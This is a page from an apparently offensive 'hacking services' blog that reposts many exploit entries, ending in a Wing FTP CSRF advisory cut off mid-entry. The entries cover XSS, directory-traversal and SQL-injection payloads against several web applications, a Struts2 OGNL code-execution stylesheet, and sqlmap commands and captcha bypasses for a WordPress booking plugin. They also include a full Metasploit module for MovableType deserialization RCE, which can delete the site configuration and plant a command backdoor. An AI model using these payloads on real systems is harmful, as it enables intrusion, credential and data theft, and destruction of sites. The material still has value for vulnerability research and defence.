Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863130963

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
source: https://www.securityfocus.com/bid/52720/info

FbiLike is prone to a cross-site scripting vulnerability because it fails to sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.

FbiLike 1.00 is vulnerable; other versions may also be affected. 

http://www.example.com/fbilike/like.php?id=[XSS]
HireHackking 
source: https://www.securityfocus.com/bid/52702/info

Apache Struts2 is prone to a remote arbitrary file-upload vulnerability because it fails to sufficiently sanitize user-supplied input.

Attackers can exploit this issue to upload arbitrary code and run it in the context of the webserver process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible. 

<?xml version="1.0" encoding="UTF-8" ?>
<xsl:stylesheet xmlns:xsl="http://www.example.com/1999/XSL/Transform"
version="1.0" xmlns:ognl="ognl.Ognl">
<xsl:template match="/">
<html> 
<body> 
<h2>hacked by kxlzx</h2> 
<h2>http://www.example.com</h2> 
<exp>
<xsl:value-of select="ognl:getValue('@Runtime@getRuntime().exec("calc")', '')"/>
</exp>
</body> 
</html> 
</xsl:template> 
</xsl:stylesheet>
HireHackking 
source: https://www.securityfocus.com/bid/52701/info

Event Calendar PHP is prone to a cross-site scripting vulnerability because it fails to sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. 

http://www.example.com/demo_eventcalendar.php?cal_id=1&cal_month=2&cal_year=[XSS]
HireHackking 
source: https://www.securityfocus.com/bid/52684/info

AtMail is prone to multiple directory-traversal vulnerabilities, an arbitrary-file-upload vulnerability, and an information-disclosure vulnerability because the application fails to sanitize user-supplied input.

An attacker can exploit these issues to obtain sensitive information, upload arbitrary code, and run it in the context of the webserver process.

Atmail 1.04 is vulnerable; other versions may also be affected. 

https://www.example.com/compose.php?func=renameattach&unique=/..././..././..././..././..././..././..././..././..././..././..././..././tmp/positive.test%00&Attachment[]=/../../../../../../../../../etc/passwd

https://www.example.com/compose.php?func=renameattach&unique=1.txt%00&Attachment[]=/../../../../../../../../../etc/passwd

https://www.example.com/mime.php?file=%0A/../../../../../../../../../etc/passwd&name=positive.html
HireHackking 
source: https://www.securityfocus.com/bid/52672/info

Minify is prone to a cross-site scripting vulnerability because it fails to sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.

Minify 2.1.3 and 2.1.4-beta are vulnerable; other versions may also be affected. 

http://www.exmaple.com/min/builder/#g=[XSS]
HireHackking 
# Exploit Title: WordPress Booking Calendar Contact Form 1.0.2[Multiple
vulnerabilities]
# Date: 2015-05-01
# Google Dork: Index of
/wordpress/wp-content/plugins/booking-calendar-contact-form/
# Exploit Author: Joaquin Ramirez Martinez [ i0akiN SEC-LABORATORY ]
# Software Link:
http://wordpress.dwbooster.com/calendars/booking-calendar-contact-form
# Vendor: CodePeople.net
# Vebdor URI: http://codepeople.net
# Version: 1.0.2
# OWASP Top10: A1-Injection
# Tested on: windows 7 ultimate + firefox + sqlmap 0.9.

============================================
* Authenticated SQL injection
============================================

========================
Description
========================


In a site that has installed the plugin vulnerable and an attacker who has
an account
editor privileges can exploit the flaw SQL injection and possibly escalate
their privileges.

========================
Vulnerability
========================
vulnerable function code is located in dex_bcf.php


function dex_bccf_load_season_prices() {
    global $wpdb;

    if ( ! current_user_can('edit_pages') )
    {
        echo 'No enough privilegies to load this content.';
        exit;
    }

    if (!defined('CP_BCCF_CALENDAR_ID'))
        define ('CP_BCCF_CALENDAR_ID',$_GET["dex_item"]);

    //.....vulnerable line

    $codes = $wpdb->get_results( 'SELECT * FROM
'.$wpdb->prefix.DEX_BCCF_SEASON_PRICES_TABLE_NAME_NO_PREFIX.' WHERE
`cal_id`='.CP_BCCF_CALENDAR_ID);
    $maxcosts = 0;

...

    if (count ($codes))
    {
        ... //Print results [bueno para seleccion mediante UNION]

        foreach ($codes as $value)
        {
           echo '<tr>';
           $price = explode(';',$value->price);
           echo '<td>'.$price[0].'</td>';
           for ($k=1; $k<=$maxcosts; $k++)
               echo '<td>'.@$price[$k].'</td>';
           echo '<td>'.substr($value->date_from,0,10).'</td>';
           echo '<td>'.substr($value->date_to,0,10).'</td>';
           echo '<td>[<a
href="javascript:dex_delete_season_price('.$value->id.')">Delete</a>]</td>';
           echo '</tr>';
        }

...
    }

======================
Injection
======================
the following urls can be used to inject code.
----------------------------------------------------------
http://wp-host/wp-path/wp-admin/?action=dex_bccf_check_posted_data&dex_bccf=loadseasonprices&dex_item=1

------------------------
GET parameter vulnerable
------------------------
dex_item

========================
injection techniques:
========================

-> UNION BASED
-> TIME BASED BLIND

=======================
POC
=======================
Obtaining all available databases from mysql server with sqlmap.
---------------------------------------------------------------

python sqlmap.py --url="
http://wp-host/wp-path/wp-admin/?action=dex_bccf_check_posted_data&dex_bccf=loadseasonprices&dex_item=1
"
-p dex_item --level=5 --risk=3 --cookie="PUT_YOUR_WP_EDITOR_COOKIE_HERE"
--dbms="mysql" --dbs

====================================================


=====================================================
* Filter bypass & Authenticated SQL injection
=====================================================

===============
Vulnerable code
================

function dex_bccf_calendar_delete($ret) {
    global $wpdb;
    $wpdb->query( "delete from ".TDE_BCCFCALENDAR_DATA_TABLE." where
id=".esc_sql($_POST["id"]) );
    return $ret;
}

======================
Injection
======================
Following URLs are affected.
----------------------------------------------------------
http://wp-host/wp-path/wp-admin/admin-ajax.php?action=dex_bccf_calendar_ajaxevent&dex_bccf_calendar_load2=delete

------------------------
POST parameter vulnerable
------------------------
id

========================
injection techniques:
========================

-> TIME BASED BLIND

=======================
POC
=======================
Obtaining all available databases from mysql server with sqlmap.
---------------------------------------------------------------

python sqlmap.py --url="
http://localhost/wordpress/wp-admin/admin-ajax.php?action=dex_bccf_calendar_ajaxevent&dex_bccf_calendar_load2=delete
"
--data="id=1" -p id --level=5 --risk=3
--cookie="PUT_YOUR_WP_EDITOR_COOKIE_HERE" --dbms="mysql" --dbs --technique T



====================================================
* Authenticated SQL injection
====================================================

===============
Vulnerable code
================

function dex_bccf_calendar_update($ret) {
    global $wpdb;

    dex_bccf_add_field_verify(TDE_BCCFCALENDAR_DATA_TABLE, "viadmin",
"varchar(10) DEFAULT '0' NOT NULL");
    dex_bccf_add_field_verify(TDE_BCCFCALENDAR_DATA_TABLE, "color",
"varchar(10)");

    $wpdb->query("update ".TDE_BCCFCALENDAR_DATA_TABLE." set
title='".esc_sql($_POST["title"])."',description='".esc_sql($_POST["description"])."',color='".esc_sql($_POST["color"])."'
where id=".esc_sql($_POST["id"]) );
    return $ret;
}

======================
Injection
======================
Following URLs are affected.
----------------------------------------------------------
http://wp-host/wp-path/wp-admin/admin-ajax.php?action=dex_bccf_calendar_ajaxevent&dex_bccf_calendar_load2=edit

------------------------
POST parameter vulnerable
------------------------
id

========================
injection techniques:
========================

-> BLIND

=======================
POC
=======================
(modifing all rows with "i0akiN" value and sleeping 5 seconds)

url
-------
http://wp-host/wp-path/wp-admin/admin-ajax.php?action=dex_bccf_calendar_ajaxevent&dex_bccf_calendar_load2=edit
----------
post data
----------
id=0 or 1=1 AND SLEEP(5) -- -
&tile=i0akiN&description=i0akiN&color=i0akiN


=====================================================
* Filter bypass & Authenticated SQL injection
=====================================================

===============
Vulnerable code
================

function dex_bccf_calendar_add($ret) {
    global $wpdb;

    $calid = str_replace  (TDE_BCCFCAL_PREFIX, "",@$_GET["id"]);
    ...

    $wpdb->query("insert into
".TDE_BCCFCALENDAR_DATA_TABLE."(viadmin,reservation_calendar_id,datatime_s,datatime_e,title,description,color)
".
                "
values(1,".esc_sql($calid).",'".esc_sql($_POST["startdate"])."','".esc_sql($_POST["enddate"])."','".esc_sql($_POST["title"])."','"
    .esc_sql($_POST["description"])."','".esc_sql($_POST["color"])."')");
    ..

}

======================
Injection
======================
Following URLs are affected.
----------------------------------------------------------
http://wp-host/wp-path/wp-admin/admin-ajax.php?action=dex_bccf_calendar_ajaxevent&dex_bccf_calendar_load2=add&id=[SQLi]

========================
injection techniques:
========================

-> Insertion data

=======================
POC
=======================

Insert a row into wp_bccf_reservation_calendars_data table without use
other post parameters

http://wp-host/wp-path/wp-admin/admin-ajax.php?action=dex_bccf_calendar_ajaxevent&dex_bccf_calendar_load2=add&
id=12,0x617373,0x617373,0x617373,0x617373,0x617373); -- -




====================================================
* Unauthenticated SQL injection
====================================================
=======================
Description
=======================

An attacker without autorization can send modified requests to database and
sensitive information
that can use for escalate privilegies and more...

======================
Vulnerability
======================
vulnerable function code is located in dex_bcf.php


function dex_bccf_caculate_price($startday, $enddate, $calendar,
$default_price) {
...

//$calendar is not sanitized in sql query

$codes = $wpdb->get_results( 'SELECT * FROM
'.$wpdb->prefix.DEX_BCCF_SEASON_PRICES_TABLE_NAME_NO_PREFIX.' WHERE
`cal_id`='.$calendar);
    $mode =
(dex_bccf_get_option('calendar_mode',DEX_BCCF_DEFAULT_CALENDAR_MODE) ==
'false');
    while (
           (($enddate>$startday) && !$mode) ||
           (($enddate>=$startday) && $mode)
           )
    {
        $daily_price = $default_price;
        $sprice = array();
        foreach ($codes as $value)
        {
           $sfrom = strtotime($value->date_from);
           $sto = strtotime($value->date_to);
           if ($startday >= $sfrom && $startday <= $sto)
           {
               $sprice = explode (';', $value->price);
               $daily_price = $sprice[0];
           }
        }
        $season_prices[] = $sprice;
        $price += $daily_price;
        $startday = strtotime (date("Y-m-d", $startday)." +1 day");
//60*60*24;
        $days++;
    }

...
}

======================
Injection
======================
Following URLs are affected.
----------------------------------------------------------
http://wp-host/wp-path/?action=dex_bccf_check_posted_data&dex_bccf=getcost

------------------------
post variable vulnerable
------------------------
dex_item=1

========================
injection techniques:
========================

-> UNION BASED <- yeaahh!!
-> TIME BASED BLIND
-> BOOLEAN BASED BLIND

========================
POC
========================
Obtaining all available databases from mysql server with sqlmap.

python sqlmap.py --url="
http://localhost/wordpress/?action=dex_bccf_check_posted_data&dex_bccf=getcost
"
--data="dex_item=1" -p dex_item --level=5 --risk=3 --dbms="mysql" --dbs
--tecnique U

===========================================================

============================================================
* Unauthenticated SQL injection 2
============================================================

========================
Description
========================

The following function is also vulnerable to SQL injection because usually
the variable
CP_BCCF_CALENDAR_ID it equals the content of POST ['dex_item'] or GET
['dex_item'] Besides this function is used in several places
the code.

========================
Vulnerability
========================
Vulnerable function:

function dex_bccf_get_option ($field, $default_value)
{
    global $wpdb, $dex_option_buffered_item, $dex_option_buffered_id;
    if (!defined("CP_BCCF_CALENDAR_ID"))
        return  $default_value;
    if ($dex_option_buffered_id == CP_BCCF_CALENDAR_ID)
        $value = @$dex_option_buffered_item->$field;
    else
    {
//....vulnerable line

       $myrows = $wpdb->get_results( "SELECT * FROM
".DEX_BCCF_CONFIG_TABLE_NAME." WHERE id=".CP_BCCF_CALENDAR_ID );
       $value = @$myrows[0]->$field;
       $dex_option_buffered_item = $myrows[0];
       $dex_option_buffered_id  = CP_BCCF_CALENDAR_ID;
    }
    if ($value == '' && $dex_option_buffered_item->calendar_language == '')
        $value = $default_value;
    return $value;
}




##########################################

======================================
    *  CAPTCHA BYPASS & ROW INSERTION
======================================

==============
DESCRIPTION
==============

An attacker can manipulate some variables for bypass conditional staments.
For example: insert unlimited rows into
table (could use a program)

=============
 ... HOW?
=============

An attacker encodes parameter GET['hdcaptcha_dex_bccf_post'] to MD5
encryption saving into value of
"rand_code" cookie.

==========
POC
==========

REQUEST
-----------
http://localhost/wordpress/wp-admin/admin-ajax.php?action=dex_bccf_check_posted_data&hdcaptcha_dex_bccf_post=1&
dex_item=1&
http://localhost/wordpress/wp-admin/admin-ajax.php?action=dex_bccf_check_posted_data&
hdcaptcha_dex_bccf_post=1&dex_item=1&hdcaptcha_dex_bccf_post=joaquin
                                                                ^
--------------                                                  |
POST VARIABLES
--------------
hdcaptcha_dex_bccf_post=1

-------
COOKIES
-------
rand_code=a6beca7f198112079f836a4e67cf4821  <---joaquin MD5 encrypted

===========================
VULNERABLE FUNCTION CODE
==========================


function dex_bccf_check_posted_data(){
  ....

if (!isset($_GET['hdcaptcha_dex_bccf_post'])
||$_GET['hdcaptcha_dex_bccf_post'] == '') $_GET['hdcaptcha_dex_bccf_post']
= @$_POST['hdcaptcha_dex_bccf_post'];
    if (
           (dex_bccf_get_option('dexcv_enable_captcha',
TDE_BCCFDEFAULT_dexcv_enable_captcha) != 'false') &&
           ( (strtolower($_GET['hdcaptcha_dex_bccf_post']) !=
strtolower($_SESSION['rand_code'])) ||
             ($_SESSION['rand_code'] == '')
           )
           &&
           ( (md5(strtolower($_GET['hdcaptcha_dex_bccf_post'])) !=
($_COOKIE['rand_code'])) ||
             ($_COOKIE['rand_code'] == '')
           )
       )
    {
        $_SESSION['rand_code'] = '';
        echo 'captchafailed';
        exit;
    }

// if this isn't the real post (it was the captcha verification) then echo
ok and exit
    if ( 'POST' != $_SERVER['REQUEST_METHOD'] || ! isset(
$_POST['dex_bccf_post'] ) )
{
    echo 'ok';
        exit;
}
   ...

}


###########################################

=======================================
   *  Persistent JS/HTML code injection
=======================================

========================
Description:
========================
Un atacante sin autenticacion puede inyectar codigo malicioso que podria
ejecutar el navegador
de la victima(could be an administrator). Cuando la victima visite la
pagina modificada, el atacante
podria robar datos y/o controlar las acciones de la victima de forma remota.

========================
Vulnerability
========================

http://localhost/wordpress/wp-admin/admin-ajax.php?action=dex_bccf_check_posted_data

POST-DATA

dex_item=2
dex_bccf_post_options=1
email_confirmation_to_user=%3C%2Ftextarea%3E CUSTOM JS/HTML INYECTION
 %3Ctextarea%3E
email_notification_to_admin=%3C%2Ftextarea%3E CUSTOM JS/HTML INYECTION
 %3Ctextarea%3E


Parameters email_confirmation_to_user,email_notification_to_admin not
filtered and is included in admin page

====================
VULNERABLE FUNCTION
====================

dex_bccf_save_options() located in dex_bccf.php

save unfiltered post data



#########################################
HireHackking 
# Exploit Title: PHPCollab 2.5 - SQL Injection
# Google Dork: filetype:php inurl:"/general/login.php?PHPSESSID="
# Date: 13/05/2015
# Exploit Author: Wad Deek
# Vendor Homepage: http://www.phpcollab.com/
# Software Link: http://sourceforge.net/projects/phpcollab/files/final/2.5/
# Version: 2.5
+>2.5<+ --> /docs/changes.txt
+>2.5<+ --> /docs/readme.txt
# Tested on: Xampp on Windows7
###################################################################################
PoC = http://127.0.0.1/phpcollab/topics/deletetopics.php?project=%27
###################################################################################
#=====================================================
require('mechanize')
agent = Mechanize.new()
agent.redirect_ok = false
agent.verify_mode = OpenSSL::SSL::VERIFY_NONE
#=====================================================
begin
html = agent.get("http://127.0.0.1/phpcollab/topics/deletetopics.php?project=%27")
rescue
else
puts(html.body())
end
#=====================================================
HireHackking 
source: https://www.securityfocus.com/bid/52666/info
    
Open Journal Systems is prone to following multiple vulnerabilities because the software fails to sufficiently sanitize user-supplied input:
    
1. An arbitrary-file-deletion vulnerability
2. A security vulnerability
3. An arbitrary-file-upload vulnerability
4. Multiple cross-site scripting vulnerabilities
    
An attacker may leverage these issues to execute arbitrary script code, upload arbitrary files, and execute arbitrary code with administrative privileges. These issues may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
    
Open Journal Systems 2.3.6 is vulnerable; other versions may also be affected. 

http://www.example.com/lib/pkp/lib/tinymce/jscripts/tiny_mce/plugins/ibrowser/scripts/rfiles.php?lang=en& param=delete|/../../../../../../../../../../../../../../../../../../../temp/file_to_delete

Arbitrary File Renaming:
http://www.example.com/lib/pkp/lib/tinymce/jscripts/tiny_mce/plugins/ibrowser/scripts/rfiles.php?lang=en& param=rename|file.jpg|file.php%00.jpg
http://www.example.com/lib/pkp/lib/tinymce/jscripts/tiny_mce/plugins/ibrowser/scripts/rfiles.php?lang=en& param=rename|/../../../../../../../../../../../../../../../../../../../tmp/file_to_move|1x.jpg
HireHackking 
source: https://www.securityfocus.com/bid/52666/info
   
Open Journal Systems is prone to following multiple vulnerabilities because the software fails to sufficiently sanitize user-supplied input:
   
1. An arbitrary-file-deletion vulnerability
2. A security vulnerability
3. An arbitrary-file-upload vulnerability
4. Multiple cross-site scripting vulnerabilities
   
An attacker may leverage these issues to execute arbitrary script code, upload arbitrary files, and execute arbitrary code with administrative privileges. These issues may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
   
Open Journal Systems 2.3.6 is vulnerable; other versions may also be affected. 

Malicious registered user shall start a new Submission:
http://www.example.com/index.php/[journal]/author/submit/1
on the second step of the Submission:
http://www.example.com/index.php/[journal]/author/submit/2?articleId=14
the user should upload test.pHp, test.asp, test.cgi, test.php3 or test.html file. The uploaded file will be available on the following URL:
http://www.example.com/files/journals/[journalid]/articles/[articleid]/submission/original/[newfilename]
The original file name will be changed, however it will be displayed to the user after upload (for example "16-28-1-SM.pHp"). File extension will remain the same.
HireHackking 
source: https://www.securityfocus.com/bid/52666/info
  
Open Journal Systems is prone to following multiple vulnerabilities because the software fails to sufficiently sanitize user-supplied input:
  
1. An arbitrary-file-deletion vulnerability
2. A security vulnerability
3. An arbitrary-file-upload vulnerability
4. Multiple cross-site scripting vulnerabilities
  
An attacker may leverage these issues to execute arbitrary script code, upload arbitrary files, and execute arbitrary code with administrative privileges. These issues may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
  
Open Journal Systems 2.3.6 is vulnerable; other versions may also be affected. 

On the following URL:
http://www.example.com/index.php/[journal]/author/submit/3?articleId=[id]
the attacker should inject malicious scripting code to the "Bio Statement" or "Abstract of Submission" fields:
<img src="x"/onerror=alert(document.cookie)>
or (browser specific):
<img style="width:expression(alert(document.cookie));"></a>
The stored XSS will be displayed here:
http://www.example.com/index.php/[submission]/author/submission/[id]
HireHackking 
source: https://www.securityfocus.com/bid/52666/info
 
Open Journal Systems is prone to following multiple vulnerabilities because the software fails to sufficiently sanitize user-supplied input:
 
1. An arbitrary-file-deletion vulnerability
2. A security vulnerability
3. An arbitrary-file-upload vulnerability
4. Multiple cross-site scripting vulnerabilities
 
An attacker may leverage these issues to execute arbitrary script code, upload arbitrary files, and execute arbitrary code with administrative privileges. These issues may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
 
Open Journal Systems 2.3.6 is vulnerable; other versions may also be affected. 

On the submissions page URL:
http://www.example.com/index.php/[journal]/author/submit/3?articleId=[id]
the attacker should add a malicious code to the "URL" field:
"><script>alert(document.cookie)</script>
the XSS will be displayed here:
http://www.example.com/index.php/[submission]/author/submission/[id]
HireHackking 
source: https://www.securityfocus.com/bid/52661/info

CMSimple is prone to a cross-site scripting vulnerability because it fails to sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.

CMSimple 3.3 is vulnerable; other versions may also be affected. 

http://www.example.com//cmsimple/cmsimplexh152/?'"</script><script>alert(document.cookie)</script>
HireHackking 
source: https://www.securityfocus.com/bid/52653/info

FirePass is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

The following versions of FirePass are affected:
6.0
6.0.1
6.0.2
6.0.2.3
6.0.3
6.1
7.0 

state=%2527+and+
(case+when+SUBSTRING(LOAD_FILE(%2527/etc/passwd%2527),1,1)=char(114)+then+
BENCHMARK(40000000,ENCODE(%2527hello%2527,%2527batman%2527))+else+0+end)=0+--+
HireHackking 
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'SixApart MovableType Storable Perl Code Execution',
      'Description'    => %q{
          This module exploits a serialization flaw in MovableType before 5.2.12 to execute
          arbitrary code. The default nondestructive mode depends on the target server having
          the Object::MultiType and DateTime Perl modules installed in Perl's @INC paths.
          The destructive mode of operation uses only required MovableType dependencies,
          but it will noticeably corrupt the MovableType installation.
      },
      'Author'         =>
        [
          'John Lightsey',
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2015-1592' ],
          [ 'URL', 'https://movabletype.org/news/2015/02/movable_type_607_and_5212_released_to_close_security_vulnera.html' ],
        ],
      'Privileged'     => false, # web server context
      'Payload'        =>
        {
          'DisableNops' => true,
          'BadChars'    => ' ',
          'Space'       => 1024,
        },
      'Compat'         =>
        {
          'PayloadType' => 'cmd'
        },
      'Platform'       => ['unix'],
      'Arch'           => ARCH_CMD,
      'Targets'        => [['Automatic', {}]],
      'DisclosureDate' => 'Feb 11 2015',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'MoveableType cgi-bin directory path', '/cgi-bin/mt/']),
        OptBool.new('DESTRUCTIVE', [true, 'Use destructive attack method (more likely to succeed, but corrupts target system.)', false])
      ], self.class
    )

  end

=begin

#!/usr/bin/perl

# generate config parameters for injection checks

use Storable;

{

    package XXXCHECKXXX;

    sub STORABLE_thaw {
        return 1;
    }

    sub STORABLE_freeze {
        return 1;
    }

}

my $check_obj = bless { ignore => 'this' }, XXXCHECKXXX;
my $frozen = 'SERG' . pack( 'N', 0 ) . pack( 'N', 3 ) . Storable::freeze({ x => $check_obj});
$frozen = unpack 'H*', $frozen;
print "LFI test for storable flaw is: $frozen\n";

{
    package DateTime;
    use overload '+' => sub { 'ignored' };
}

=end

  def check
    vprint_status("#{peer} - Sending storable test injection for XXXCHECKXXX.pm load failure")
    res = send_request_cgi({
        'method'    => 'GET',
        'uri'       => normalize_uri(target_uri.path, 'mt-wizard.cgi'),
        'vars_get' => {
          '__mode' => 'retry',
          'step'   => 'configure',
          'config' => '53455247000000000000000304080831323334353637380408080803010000000413020b585858434845434b58585801310100000078'
        }
      })

    unless res && res.code == 200 && res.body.include?("Can't locate XXXCHECKXXX.pm")
      vprint_status("#{peer} - Failed XXXCHECKXXX.pm load test");
      return Exploit::CheckCode::Safe
    end
    Exploit::CheckCode::Vulnerable
  end

  def exploit
    if datastore['DESTRUCTIVE'] == true
      exploit_destructive
    else
      exploit_nondestructive
    end
  end

=begin

#!/usr/bin/perl

# Generate nondestructive config parameter for RCE via Object::MultiType
# and Try::Tiny. The generated value requires minor modification to insert
# the payload inside the system() call and resize the padding.

use Storable;

{
    package Object::MultiType;
    use overload '+' => sub { 'ingored' };
}

{
    package Object::MultiType::Saver;
}

{
    package DateTime;
    use overload '+' => sub { 'ingored' };
}

{
    package Try::Tiny::ScopeGuard;
}

my $try_tiny_loader = bless {}, 'DateTime';
my $multitype_saver = bless { c => 'MT::run_app' }, 'Object::MultiType::Saver';
my $multitype_coderef = bless \$multitype_saver, 'Object::MultiType';
my $try_tiny_executor = bless [$multitype_coderef, 'MT;print qq{Content-type: text/plain\n\n};system(q{});' . ('#' x 1025) . "\nexit;"], 'Try::Tiny::ScopeGuard';

my $data = [$try_tiny_loader, $try_tiny_executor];
my $frozen = 'SERG' . pack( 'N', 0 ) . pack( 'N', 3 ) . Storable::freeze($data);
$frozen = unpack 'H*', $frozen;
print "RCE payload requiring Object::MultiType and DateTime: $frozen\n";

=end

  def exploit_nondestructive
    print_status("#{peer} - Using nondestructive attack method")
    config_payload = "53455247000000000000000304080831323334353637380408080802020000001411084461746554696d6503000000000411155472793a3a54696e793a3a53636f7065477561726402020000001411114f626a6563743a3a4d756c7469547970650411184f626a6563743a3a4d756c7469547970653a3a536176657203010000000a0b4d543a3a72756e5f6170700100000063013d0400004d543b7072696e742071717b436f6e74656e742d747970653a20746578742f706c61696e5c6e5c6e7d3b73797374656d28717b"
    config_payload <<  payload.encoded.unpack('H*')[0]
    config_payload << "7d293b"
    config_payload << "23" * (1025 - payload.encoded.length)
    config_payload << "0a657869743b"

    print_status("#{peer} - Sending payload (#{payload.raw.length} bytes)")

    send_request_cgi({
      'method'    => 'GET',
      'uri'       => normalize_uri(target_uri.path, 'mt-wizard.cgi'),
      'vars_get' => {
        '__mode' => 'retry',
        'step'   => 'configure',
        'config' => config_payload
      }
    }, 5)
  end

=begin

#!/usr/bin/perl

# Generate destructive config parameter to unlink mt-config.cgi

use Storable;

{
    package CGITempFile;
}

my $unlink_target = "mt-config.cgi";
my $cgitempfile = bless \$unlink_target, "CGITempFile";

my $data = [$cgitempfile];
my $frozen = 'SERG' . pack( 'N', 0 ) . pack( 'N', 3 ) . Storable::freeze($data);
$frozen = unpack 'H*', $frozen;
print "RCE unlink payload requiring CGI: $frozen\n";

=end

  def exploit_destructive
    print_status("#{peer} - Using destructive attack method")
    # First we need to delete mt-config.cgi using the storable injection

    print_status("#{peer} - Sending storable injection to unlink mt-config.cgi")

    res = send_request_cgi({
      'method'    => 'GET',
      'uri'       => normalize_uri(target_uri.path, 'mt-wizard.cgi'),
      'vars_get' => {
        '__mode' => 'retry',
        'step'   => 'configure',
        'config' => '534552470000000000000003040808313233343536373804080808020100000004110b43474954656d7046696c650a0d6d742d636f6e6669672e636769'
      }
    })

    if res && res.code == 200
      print_status("Successfully sent unlink request")
    else
      fail_with(Failure::Unknown, "Error sending unlink request")
    end

    # Now we rewrite mt-config.cgi to accept a payload

    print_status("#{peer} - Rewriting mt-config.cgi to accept the payload")

    res = send_request_cgi({
      'method'    => 'GET',
      'uri'       => normalize_uri(target_uri.path, 'mt-wizard.cgi'),
      'vars_get'  => {
        '__mode'             => 'next_step',
        'step'               => 'optional',
        'default_language'   => 'en_us',
        'email_address_main' => "x\nObjectDriver mysql;use CGI;print qq{Content-type: text/plain\\n\\n};if(my $c = CGI->new()->param('xyzzy')){system($c);};unlink('mt-config.cgi');exit;1",
        'set_static_uri_to'  => '/',
        'config'             => '5345524700000000000000024800000001000000127365745f7374617469635f66696c655f746f2d000000012f', # equivalent to 'set_static_file_to' => '/',
      }
    })

    if res && res.code == 200
      print_status("Successfully sent mt-config rewrite request")
    else
      fail_with(Failure::Unknown, "Error sending mt-config rewrite request")
    end

    # Finally send the payload

    print_status("#{peer} - Sending payload request")

    send_request_cgi({
      'method'    => 'GET',
      'uri'       => normalize_uri(target_uri.path, 'mt.cgi'),
      'vars_get'  => {
        'xyzzy'   => payload.encoded,
      }
    }, 5)
  end

end
HireHackking 
source: https://www.securityfocus.com/bid/52651/info

WebGlimpse is prone to a directory-traversal vulnerability because it fails to properly sanitize user-supplied input.

Remote attackers can use specially crafted requests with directory-traversal sequences ('../') to retrieve arbitrary files in the context of the application.

Exploiting this issue may allow an attacker to obtain sensitive information that could aid in further attacks.

WebGlimpse 2.18.7 is vulnerable; other versions may also be affected. 

http://www.example.com/wgarcmin.cgi?NEXTPAGE=D&ID=1&DOC=../../../../etc/passwd
HireHackking 
# Exploit Title: CSRF add arbitrary users
# Google Dork:
# Date: 2015-04-28
# Exploit Author:  John Page (hyp3rlinx)
#Website: hyp3rlinx.altervista.org/
# Vendor Homepage: http://www.wftpserver.com/serverhistory.htm
# Software Link: http://www.wftpserver.com/
# Version: 4.4.5
# Tested on: windows 7
# Category: webapps

Wing FTP Server Admin 4.4.5 - CSRF Vulnerability Add Users

Vendor:
http://www.wftpserver.com/serverhistory.htm
============================================


Release Date:
=============
2015-04-28


Source:
====================================
http://hyp3rlinx.altervista.org/advisories/AS-WFTP0328.txt


Common Vulnerability Scoring System:
====================================
Overall CVSS Score 8.9


Product:
===============================
Wing FTP Server is a Web based administration FTP client that supports
following protocols FTP, FTPS, HTTPS, SSH


Advisory Information:
==============================
CSRF vulnerability within Wing FTP Server Admin that allows adding
arbitrary users to the system.


Vulnerability Disclosure Timeline:
==================================
March 28, 2015: Vendor Notification
March 28, 2015: Vendor Response/Feedback
April 19, 2015: Vendor Notification
April 28, 2015: Vendor released new version 4.4.6
April 28, 2015: Public Disclosure - John Page (hyp3rlinx)


Exploitation Technique:
=======================
Remote


Severity Level:
===============
High


Technical Details & Description:
================================


Request Method(s):
                                [+] POST


Vulnerable Product:
                                [+] Wing FTP Server Admin <= 4.4.5


Vulnerable Parameter(s):
                                [+] domain & type


Affected Area(s):
                                [+] Server Admin


Proof of Concept (POC):
=======================
The CSRF vulnerability can be exploited by remote attackers without
privileged application user account and with low user interaction (click).
Payload will add arbitrary users to the system.

POC: Example

http://localhost:5466/admin_loglist.html?domain=[CSRF]

POC: Add arbitrary user:

